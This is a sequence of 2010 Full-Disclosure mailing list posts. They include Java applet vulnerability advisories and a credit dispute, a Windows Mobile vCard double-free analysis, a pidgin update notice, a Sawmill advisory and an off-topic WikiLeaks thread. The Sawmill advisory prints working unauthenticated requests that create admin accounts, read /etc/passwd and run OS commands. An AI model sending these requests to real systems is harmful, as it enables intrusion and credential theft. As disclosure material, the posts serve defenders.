[Full-disclosure] Java Multiple Issues
Hi all and sorry for cross post, after several months since I contacted Oracle informing them about ten issues on Java applet security, they finally released an Java 6 update 22 which fixes several security issues In particular the issues are the following, sorted by impact: * Information Disclosure: - 17364779 NETWORKINTERFACE HASHCODE PROBLEM - 17322679 JAVA APPLET DNS IP DISCLOSURE * User Assisted Arbitrary Execution: - 17322757 ZERO TERMINATOR ALLOWS JNLP SHORTCUTS - 17322755 NEW LINES IN JNLP TITLE ARE COPIED INTO LNK FILES * Network and WEB Attacks: - 17322683 HTTP REQUEST SPLITTING WITH JAVA ADDREQUESTPROPERTY - 17764405 DNS REBINDING ISSUE - 17322681 JAVA APPLET SAME IP HOST ACCESS You can read all details here: http://blog.mindedsecurity.com/2010/10/java-6u21-seven-issues-summary.html Disclosure Timeline: 20th Apr - 6 May 2010: Advisories sent to Oracle 25th June 2010: Oracle Confirms all issues 12 Oct 2010: Java update 22 released which fixes 7 out of 10 issues. 11-20 Oct 2010: Minded Security Advisories pubicly disclosed. Cheers, Stefano Di Paola -- Stefano Di Paola Chief Technology Officer, Lead Auditor ISO 27001 Minded Security - Application Security Consulting ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor
Hello all, We don't send emails to communicate sponsorships as we undertsand is quite disturbing and we all receive a lot of email. But this is a special situation as I want to transmit a big THANK YOU to the Hex Rays team, and specially to Ilfak Guilfanov, as he has been absolutely kind with us, giving it support as quick as he was able to. IDA Pro es a great product, but the team behind is the greatest. Thanks a lot, Hex Rays http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
Hey, Michal thanks for the reply to defend credits :). I had some moderation issues when I tried to send some word about this. Just for sake of clarification: I sent the advisory to Oracle on 20th April 2010. Oracle acknowledged the issue on june. If Roberto sent the advisory to Oracle then Oracle just didn't tell him they already knew about it. If Roberto just sent the issue to Apache then no one's faulty. :) Anyway I hope credits will be at least shared between me and Roberto. Cheers, Stefano 2010/10/20 Michal Zalewski lcam...@coredump.cx: Security-Assessment.com follows responsible disclosure and promptly contacted Oracle after discovering the issue. Oracle was contacted on August 1, 2010. My understanding is that Stefano Di Paola of Minded Security reported this back in April; and further, the feature was a part of reasonably well-documented functionality of Java pretty much ever since: http://download.oracle.com/javase/6/docs/api/java/net/URL.html Two hosts are considered equivalent if both host names can be resolved into the same IP addresses This was a pretty horrible design, so it's good to see it gone, though. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
In the patch for CVE-2008-5343 (GIFAR) Sun tightened their file parsing rules for remote JAR files, making it harder to smuggle JAR files onto the end of other filetypes. This makes it more difficult to create a GIF+JAR hybrid file. AFAIK, local JAR files were considered out of scope and will not be subject to the additional file parsing scrutiny. Sun/Oracle has not removed the ability to modify arbitrary HOST headers. So, if an attacker can upload a JAR file to a web app, they will have the ability to jump to any domain (virtual hosted or subdomain) that exists on the server. The cookies sent by the applet will be from the domain provided in the URL object, however the content returned by the server will be from the domain specified in the HOST header. This can cause havoc for places where separation relies on subdomains (like wordpress.com et al.) where users have by-design control of content on one subdomain and uses that content to target users on a different subdomain. Java also doesn't respect file extension, content-type, or content-disposition returned by the web server making it a bit easier to upload JAR files to unsuspecting web apps. BK On Wed, Oct 20, 2010 at 1:18 PM, Chris Evans scarybea...@gmail.com wrote: On Wed, Oct 20, 2010 at 8:58 AM, Michal Zalewski lcam...@coredump.cxwrote: Security-Assessment.com follows responsible disclosure and promptly contacted Oracle after discovering the issue. Oracle was contacted on August 1, 2010. My understanding is that Stefano Di Paola of Minded Security reported this back in April; and further, the feature was a part of reasonably well-documented functionality of Java pretty much ever since: http://download.oracle.com/javase/6/docs/api/java/net/URL.html The Host: header trick was also used back in 2008 in Billy Rios' GIFAR attack -- to get around the fact that Picasa hosts images on a separate domain: http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/ The blog post title was SUN Fixes GIFARs, although it's not immediately obvious to me what was changed or fixed. If anyone knows what was changed back then and/or in this latest release, it would be interesting to see it documented. Cheers Chris Two hosts are considered equivalent if both host names can be resolved into the same IP addresses This was a pretty horrible design, so it's good to see it gone, though. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
Hi Roberto,
nice to see you always alive and kicking!
It seems we found the same stuff :) my bad I haven't yet published it.
Soon also my advisory with some collateral effect^N^N^N^N^N^Nthoughts.
Cheers
Stefano
Il giorno mer, 20/10/2010 alle 00.20 +1300, Roberto Suggi Liverani ha
scritto:
(, ) (,
. `.' ) ('.',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( _ ) Y Y \
/__ /\___|__ / \___ /|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_='```=.
presents..
Oracle JRE - java.net.URLConnection class –
Same-of-Origin (SOP) Policy Bypass
PDF:
http://www.security-assessment.com/files/advisories/Oracle_JRE_java_net_urlconnection_SOP_Bypass.pdf
CVE Identifier: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3573
+---+
|Description|
+---+
Security-Assessment.com discovered that a Java Applet
making use of java.net.URLConnection class can be used
to bypass same-of-origin (SOP) policy and domain based
security controls in modern browsers when communication
occurs between two domains that resolve to the same IP
address. This advisory includes a Proof-of-Concept
(PoC) demo and a Java Applet source code, which
demonstrates how this security can be exploited to leak
cookie information to an unauthorised domain, which
resides on the same host IP address.
++
|Exploitation|
++
The Flash movie demo can be viewed at the following
link:
http://www.security-assessment.com/files/advisories/java_net_urlconnection_sop_bypass_demo.swf
Proof of Concept (PoC) in demo demonstrates that a
Cross Site Request Forgery (XSRF) attack can be leveraged
by using a Java Applet which implements the
java.net.URLConnection class. Traditionally, XSRF is used
to force a user to perform an unwanted action on a target
web site. In this case, the PoC shows that XSRF can be
used to capture sensitive information such as cookie
associated to a target web site.
The following assumptions are made in this PoC:
1. Virtual hosts www.targetsite.net and
www.badsite.com resolve to the same IP address;
2. Malicious user controls www.badsite.com web site;
3. Malicious user targets www.targetsite.net users.
The following list summarises the sequence of actions
shown in the demo:
1. User has a valid cookie for www.targetsite.net
2. The same user visits www.badsite.com which performs
a cross site forged request to www.targetsite.net .
The forged request is performed by a Java Applet
embedded on the malicious site. The Java Applet
bypasses the Same-of-Origin policy as an unsigned Java
Applet should not be able to communicate
from www.badsite.com to www.targetsite.net without
a crossdomain.xml policy file.
3. Java Applet performs first GET request to
www.targetsite.net. At this stage, the Java Applet
controls the Cookie: header sent to www.targetsite.net
through the getRequestProperty(cookie) method.
This is in breach with SOP.
4. A second request is done for the purpose
of the demo which leaks www.targetsite.net
cookie’s to www.badsite.com via an HTTP GET
request.
Testing was successfully performed using Java(TM)
SE Runtime Environment (build 1.6.0_21-b07) and the
following browsers:
- Mozilla Firefox 3.5.8 (Windows XP)
- Opera 10.60 (Windows XP)
- Internet Explorer 6.0.2900.5512 (Windows XP)
- Google Chrome 5.0.375.9 (Windows XP)
- Internet Explorer 8.0.6001.18702 (Windows XP)
- Safari 5.0 (7533.16) (Windows XP)
The Java Applet source code used in the demo can be
downloaded at the following link:
http://www.security-assessment.com/files/advisories/MaliciousJavaApplet.zip
++
|Solution|
++
Security-Assessment.com follows responsible disclosure
and promptly contacted Oracle after discovering
the issue. Oracle was contacted on August 1,
2010.
Oracle has created a fix for this vulnerability which
has been included as part of Critical Patch Update
Advisory - October 2010. Security-Assessment.com
recommends all users of JRE and JDK to upgrade to
the latest version as soon as possible.
For more information on the new release of JRE/JDK
please refer to the link:
http://www.oracle.com/technetwork/java/javase/downloads/index.html
+--+
|Credit|
+--+
Discovered and advised to Oracle
August 2010 by Roberto Suggi Liverani of
Security-Assessment.com.
Personal site: http://malerisch.net
+-+
|Extra|
+-+
Another interesting attack was discovered as part
of the research on this vulnerability.
This attack is another example of leveraging XSRF
with the potential of leaking cookie, basic and digest
authentication tokens using Java Applet and the
Compability
Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
Hey all, I think it's Oracle bad. I reported to Oracle this issue back on april 20th and probably Oracle when Roberto reported the same stuff on August just said Thank you and nothing more to Roberto. Also Oracle seems to do mass credit so everyone can think that anyone found anything among the 29 advisories :D http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html Anyway, I'll post the advisory today clarification :) Cheers Stefano Il giorno mer, 20/10/2010 alle 08.58 -0700, Michal Zalewski ha scritto: Security-Assessment.com follows responsible disclosure and promptly contacted Oracle after discovering the issue. Oracle was contacted on August 1, 2010. My understanding is that Stefano Di Paola of Minded Security reported this back in April; and further, the feature was a part of reasonably well-documented functionality of Java pretty much ever since: http://download.oracle.com/javase/6/docs/api/java/net/URL.html Two hosts are considered equivalent if both host names can be resolved into the same IP addresses This was a pretty horrible design, so it's good to see it gone, though. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
the keys to the interwebz! CC: roberto.su...@security-assessment.com; full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com From: d...@doxpara.com Subject: Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass Date: Wed, 20 Oct 2010 10:38:12 -0700 To: lcam...@coredump.cx Sent from my iPhone On Oct 20, 2010, at 8:58 AM, Michal Zalewski lcam...@coredump.cx wrote: Security-Assessment.com follows responsible disclosure and promptly contacted Oracle after discovering the issue. Oracle was contacted on August 1, 2010. My understanding is that Stefano Di Paola of Minded Security reported this back in April; and further, the feature was a part of reasonably well-documented functionality of Java pretty much ever since: http://download.oracle.com/javase/6/docs/api/java/net/URL.html Two hosts are considered equivalent if both host names can be resolved into the same IP addresses This was a pretty horrible design, so it's good to see it gone, though. Eh, you can see where it came from though. Design bugs like this are absolutely miserable to fix (see how we'll never get rebinding out of the browser) and letting identical IP's script against eachother lets an awful lot of legitimate traffic through while blocking almost all attacks. I'm not saying it's a preferred design, but let's reserve horrible for things that don't have quite the obvious thought process behind them. Is this, in fact, gone now? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SecurityArchitect-009]: Microsoft Windows Mobile Double Free Vulnerability
Vendor: Microsoft
Product: Windows Mobile
Vulnerability: Double Free
Tested vulnerable versions: Windows Mobile 6.1 and 6.5
Tested on : HTC Touch (WM 6.1), HTC Touch2 (WM 6.5)
CREDITS: Celil Ünüver from SecurityArchitect.Org
CONTACT: celilunuver[n0sp4m]gmail.com
Vulnerability Details and Analysis:
The vulnerability is a double free. It occurs when multiple buffers are
allocated to handle a very large Name (N) field in the vCard (.vcf) file. This
file can be received by MMS or Bluetooth. After opening the malformed vcf file,
it gives an error dialog. Then it frees the buffers and crashes;
pimutil.dll:
.text:02B73DE0 sub_2B73DE0 ; CODE XREF:
sub_2B74388+1Cp.text:02B73DE0 STMFD SP!, {R4,LR}.text:02B73DE4
MOV R4, R0.text:02B73DE8 LDR R2, [R4,#0xC].text:02B73DEC
LDR R3, =off_2B66DB8.text:02B73DF0 CMP R2, #0.text:02B73DF4
LDRNE R0, [R4,#8].text:02B73DF8 STR R3, [R4].text:02B73DFC
BLNEsub_2BA6350.text:02B73E00 LDR R0, [R4,#8].text:02B73E04
BL sub_2BA56F8 ; sysfreestrng().text:02B73E08 LDR R0, [R4,#0x14]
*!*.text:02B73E0C BL sub_2BA56F8 ; sysfreestring.text:02B73E10
LDR R0, [R4,#0x14] *DOUBLE FREE!!!**.text:02B73E14 BL
sub_2BA56F8 ; sysfreestring.text:02B73E18 LDR R0,
[R4,#8].text:02B73E1C BL sub_2BA56F8.text:02B73E20 LDR R3,
=(dword_2B66D30+8).text:02B73E24 STR R3, [R4].text:02B73E28
LDMFD SP!, {R4,LR}.text:02B73E2C BX LR
*As you see that the pointer at [R4 + 0x14] is passed to SysFreeString() twice.
text:0271E4C0 SysFreeString ; CODE XREF:
sub_271AE68+1Cp.text:0271E4C0 ;
sub_271AE68+24p text:0271E4C0 STMFD SP!,
{R4,LR}.text:0271E4C4 CMP R0, #0.text:0271E4C8
BEQ loc_271E508.text:0271E4CC LDR R3,
=0x1ECD1B8.text:0271E4D0 SUB R4, R0, #8.text:0271E4D4
LDR R0, [R3].text:0271E4D8 BL
sub_27391B8.text:0271E4DC CMP R0, #0.text:0271E4E0
BNE loc_271E4F4.text:0271E4E4 MOV R0,
R4.text:0271E4E8 BL sub_2739168.text:0271E4EC
LDMFD SP!, {R4,LR}.text:0271E4F0 BX LR.text:0271E4F4
;
---.text:0271E4F4.text:0271E4F4
loc_271E4F4 ; CODE XREF:
SysFreeString+20j.text:0271E
4F4 LDR R3, [R4] -CRASH !!.text:0271E4F8
MOV R1, R4.text:0271E4FC ADD R3, R3,
#0x19.text:0271E500 BIC R2, R3, #0xF.text:0271E504
BL sub_27295BC.text:0271E508
*The code at location 0271E4F4 is attempting to extract the 'size' from the
heap chunk header.
Exploiting:
Double Frees are usually exploitable but in this case it doesnt look simple.
The calls to free() occurs in immediate succession. WinCE supports
multi-threading, but this is an extremely hard case to try.. I do not have deep
knowledge about WinCE heap structures. So it may be denial of service but I
think it can be possible to exploit this vulnerability. (impossible is nothing
! :P)
Proof of Concept:
www.securityarchitect.org/exploits/wmpoc.vcf
Vendor-Patch Status:It's 0day :]Actually I contacted Microsoft but they said
;we fixed this issue on WM 6.5 version and we can not publish a bulletin for
it But i m sure that it is not fixed on 6.5 version. I've tested it on several
devices which have WM 6.5. Also I've tested it on WM 6.5 Professional Emulator
(which can be downloaded from MS Pages) , it crashes too
Last Words:We are not dead , just busy !
Greets to: SecurityArchitect Members (Ulascan) , Hellcode, murderkey ...
Links:www.securityarchitect.orgblog . securityarchitect . org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor
paranoid Uhm, why the redirection through Facebook? /paranoid 2010/10/21 Román Ramírez pat...@0z0ne.com Hello all, We don't send emails to communicate sponsorships as we undertsand is quite disturbing and we all receive a lot of email. But this is a special situation as I want to transmit a big THANK YOU to the Hex Rays team, and specially to Ilfak Guilfanov, as he has been absolutely kind with us, giving it support as quick as he was able to. IDA Pro es a great product, but the team behind is the greatest. Thanks a lot, Hex Rays http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20101021-0 :: Multiple critical vulnerabilities in Sawmill log analysis software
SEC Consult Security Advisory 20101021-0
===
title: Multiple critical vulnerabilities
product: Sawmill - Universal Log File Analysis
vulnerable version: Sawmill Enterprise v8.1.7.3
fixed version: v8.1.7.3
impact: critical
homepage: http://www.sawmill.net
found: 2010-07-20
by: J. Greil / SEC Consult / www.sec-consult.com
===
Vendor description:
---
Sawmill is universal log analysis software that runs on every major
platform. It can process almost any type of log data. The reports that
Sawmill generates are hierarchical, attractive, and heavily
cross-linked for easy navigation. Complete documentation is built
directly into the program.
source:
http://www.sawmill.net/features.html
Vulnerability overview/description:
---
Sawmill suffers from multiple critical vulnerabilities which allow an
_unauthenticated_ attacker to gain administrative rights. Furthermore
it is possible to access (RW) the file system and execute arbitrary
commands on the operating system without authentication.
Attackers with valid accounts are able to reset the root password or
add/delete log profiles, view and manipulate admin settings etc.
It must be noted that further vulnerabilities are to be expected
within the software (such as buffer overflows, etc.). Due to lack of
time no further vulnerabilities could be searched.
1) Unauthenticated access to critical functions
Unauthenticated attackers are e.g. able to create new user accounts
with administrative Manager roles. It is possible to exploit the
built-in salang scripting language to read/write files on the file
system (e.g. user configuration with MD5 hashes), connect to other
internal systems or execute arbitrary operating system commands.
2) Insufficient validation of user access rights
Users with standard access rights/roles (e.g. Statistics Visitor) are
able to access functions or methods of the Sawmill application where
they shouldn't have access to (default permissions of installation).
Statistics visitor users are able to access administrative functions
or admin menus in order to gain sensitive information or even manipulate
settings, create new profiles or delete profiles. The creation of new
profiles also results in a denial-of-service (temporarily until admin
deletes profiles) if more profiles are being created than the license
currently allows.
It is possible to access the Sawmill setup page in order to reset the
Sawmill root username and password with a standard user account.
A standard user is also able to gain access to more functions within
the interface (e.g. regarding profiles) just by changing local
JavaScript variables, e.g. through an intercepting proxy server.
3) XSS / CSRF
There are many parameters which are not properly sanitised and
vulnerable to XSS. Furthermore no protection against CSRF is in place
which e.g. allows remote attackers to reset the root password by
e.g. exploiting the vulnerabilities in section 1 or 2.
Proof of concept:
-
1) Unauthenticated access to critical functions
* Create a user account with admin rights:
http://$host/?a=cuu=testingpw=testingroles=role_1
* Read files of the file system:
http://$host/?a=eeexp=error(read_file('/etc/passwd'))
http://$host/?a=eeexp=error(read_file('LogAnalysisInfo/users.cfg'))
(error() call is needed to print the output within the web interface
instead of stdout)
* Write files:
E.g. use the write_file() method
* Execute OS commands:
http://$host/?a=eeexp=exec('/bin/ls','Output',1))
(exec() only returns PID and no output. I'll leave it to the
creativity of the reader to further exploit this :))
2) Insufficient validation of user access rights
* Access to the new profile wizard including file browser as standard
Statistics viewer user:
This feature also allows to choose arbitrary files as log analysis
input and to disclose its contents then (file disclosure):
http://$host/?dp+templates.new_profile_wizard.index
* Access the Sawmill setup page to reset Sawmill root password:
http://$host/?dp=templates.setup
* Gain sensitive information, such as config/user settings:
http://$host/?dp=templates.admin_pages.users.get_datav.fp.is_root_admin=truev.fp.is_unlimited_grants=true
http://$host/?dp=templates.admin_pages.root_admin.get_data
[... see file system for further pages ...]
* Manipulate/create/delete user accounts:
POST /?dp+templates.admin_pages.users.save_data
Host: $host
v.fp.is_enterprise=true
v.fp.deleted_users=
v.fp.users.user_1.is_new=false
v.fp.users.user_1.username=x
v.fp.users.user_1.password=
v.fp.users.user_1.language=
v.fp.users.user_1.created_by_user=root_admin
v.fp.users.user_1.access.0.all_profiles=false
v.fp.users.user_1.access.0
[Full-disclosure] [ MDVSA-2010:208 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:208 http://www.mandriva.com/security/ ___ Package : pidgin Date: October 21, 2010 Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0 ___ Problem Description: A security vulnerability has been identified and fixed in pidgin: It has been discovered that eight denial of service conditions exist in libpurple all due to insufficient validation of the return value from purple_base64_decode(). Invalid or malformed data received in place of a valid base64-encoded value in portions of the Yahoo!, MSN, MySpaceIM, and XMPP protocol plugins and the NTLM authentication support trigger a crash. These vulnerabilities can be leveraged by a remote user for denial of service (CVE-2010-3711). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 This update provides pidgin 2.7.4, which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3711 http://pidgin.im/news/security/ ___ Updated Packages: Mandriva Linux 2009.0: 01b8018cd3acd742b80ae39cf9437f61 2009.0/i586/finch-2.7.4-0.1mdv2009.0.i586.rpm 7e9adf0099fc897f11377897f879b8ee 2009.0/i586/libfinch0-2.7.4-0.1mdv2009.0.i586.rpm 149fce87377d5d0b2c33b616f45c973a 2009.0/i586/libpurple0-2.7.4-0.1mdv2009.0.i586.rpm 704fe07620e9822116bf7d7d0d58d7b2 2009.0/i586/libpurple-devel-2.7.4-0.1mdv2009.0.i586.rpm e1c4593f294198e53b9a3fe1a0bab068 2009.0/i586/pidgin-2.7.4-0.1mdv2009.0.i586.rpm 96bdc026fd3bcdc86f3a2968dc346253 2009.0/i586/pidgin-bonjour-2.7.4-0.1mdv2009.0.i586.rpm e200d998e4d1e02bbf2c6c1813199c55 2009.0/i586/pidgin-client-2.7.4-0.1mdv2009.0.i586.rpm 3b0973e9f4a7a3850699ecbf05c7594f 2009.0/i586/pidgin-gevolution-2.7.4-0.1mdv2009.0.i586.rpm 65a4bc6fbc1ad89e1985ebecd5420255 2009.0/i586/pidgin-i18n-2.7.4-0.1mdv2009.0.i586.rpm 70b78c339f53fb9c3dab8c6ac587d903 2009.0/i586/pidgin-meanwhile-2.7.4-0.1mdv2009.0.i586.rpm ac8affa20bd6bb5e93987804885f6bfc 2009.0/i586/pidgin-perl-2.7.4-0.1mdv2009.0.i586.rpm 195a4a495944d9d59abff9f7617a877a 2009.0/i586/pidgin-plugins-2.7.4-0.1mdv2009.0.i586.rpm 26c08e34c2392f67994811b18286d2cd 2009.0/i586/pidgin-silc-2.7.4-0.1mdv2009.0.i586.rpm 9dde81a28d9f1538cd9d97c48fdcf991 2009.0/i586/pidgin-tcl-2.7.4-0.1mdv2009.0.i586.rpm bbfe063e27008c72e0a2f9793906f5e4 2009.0/SRPMS/pidgin-2.7.4-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b47c892f7c4874a95dd98bb6864354cc 2009.0/x86_64/finch-2.7.4-0.1mdv2009.0.x86_64.rpm 08d882fd48a6e2e74716a3605751475a 2009.0/x86_64/lib64finch0-2.7.4-0.1mdv2009.0.x86_64.rpm 9b77d3f7691759132cd83c143d545bbc 2009.0/x86_64/lib64purple0-2.7.4-0.1mdv2009.0.x86_64.rpm db9e939bd921d388aa28e3da5e1f1e74 2009.0/x86_64/lib64purple-devel-2.7.4-0.1mdv2009.0.x86_64.rpm f34250d75b0fd111c45ee8e3a7e066f2 2009.0/x86_64/pidgin-2.7.4-0.1mdv2009.0.x86_64.rpm d372c8bb109cb12708b9e02706879411 2009.0/x86_64/pidgin-bonjour-2.7.4-0.1mdv2009.0.x86_64.rpm cef6333cc6b7aedd8eb5d38a38925506 2009.0/x86_64/pidgin-client-2.7.4-0.1mdv2009.0.x86_64.rpm 12fb53acdd919875a6ca23ee2a2e6fa4 2009.0/x86_64/pidgin-gevolution-2.7.4-0.1mdv2009.0.x86_64.rpm 29077064095cc4fb8ef64bd06e7f495c 2009.0/x86_64/pidgin-i18n-2.7.4-0.1mdv2009.0.x86_64.rpm 5d71995b91428993338169017a853e6f 2009.0/x86_64/pidgin-meanwhile-2.7.4-0.1mdv2009.0.x86_64.rpm cafd698ff2ccc9a0b1b63e3e4724ceba 2009.0/x86_64/pidgin-perl-2.7.4-0.1mdv2009.0.x86_64.rpm e4f1437744385900c5c3bb2f7a34e41e 2009.0/x86_64/pidgin-plugins-2.7.4-0.1mdv2009.0.x86_64.rpm 4c88b13b9066c871e656d6c7b5de3749 2009.0/x86_64/pidgin-silc-2.7.4-0.1mdv2009.0.x86_64.rpm f1b7210f0909e75bb1ea6ab8dacb6474 2009.0/x86_64/pidgin-tcl-2.7.4-0.1mdv2009.0.x86_64.rpm bbfe063e27008c72e0a2f9793906f5e4 2009.0/SRPMS/pidgin-2.7.4-0.1mdv2009.0.src.rpm Mandriva Linux 2010.0: 4a807e2430c8de3afef0fd8705c64756 2010.0/i586/finch-2.7.4-0.1mdv2010.0.i586.rpm 37c9fa1be9da720ab2df2a23d05b2e45 2010.0/i586/libfinch0-2.7.4-0.1mdv2010.0.i586.rpm 01b0d18fdd89e7e9d21e1efcb7ed25ef 2010.0/i586/libpurple0-2.7.4-0.1mdv2010.0.i586.rpm b09905fe21241e96782d31836aa569f6 2010.0/i586/libpurple-devel-2.7.4-0.1mdv2010.0.i586.rpm d567efd8c615daf2775c1ddce4564021 2010.0/i586/pidgin-2.7.4-0.1mdv2010.0.i586.rpm bf724f06c191e8650020fb6003f3faba 2010.0/i586/pidgin-bonjour-2.7.4-0.1mdv2010.0.i586.rpm 461e35ca45634158c58272611e4ddacb 2010.0/i586/pidgin-client-2.7.4-0.1mdv2010.0.i586.rpm
[Full-disclosure] wikileaks still under attack, pressure revved up
Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which could jeopardise the protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote: Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
Hi Cal, I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. Agreed. Just to play devils advocate: Would Barrack Obama also be culpable? His campaign platform included a withdrawl from Iraq (Afghanistan was a different story). So troops are still there because he [apparently] lied to [fraudulently] obtain the office. If the troops weren't there, then the troops would not be at risk, and there would be no wiki leaks story. quod erat demonstrandum. Jeffrey Walton Baltimore, MD, US On Thu, Oct 21, 2010 at 12:51 PM, Cal Leeming [Simplicity Media Ltd] cal.leem...@simplicitymedialtd.co.uk wrote: This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which could jeopardise the protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens 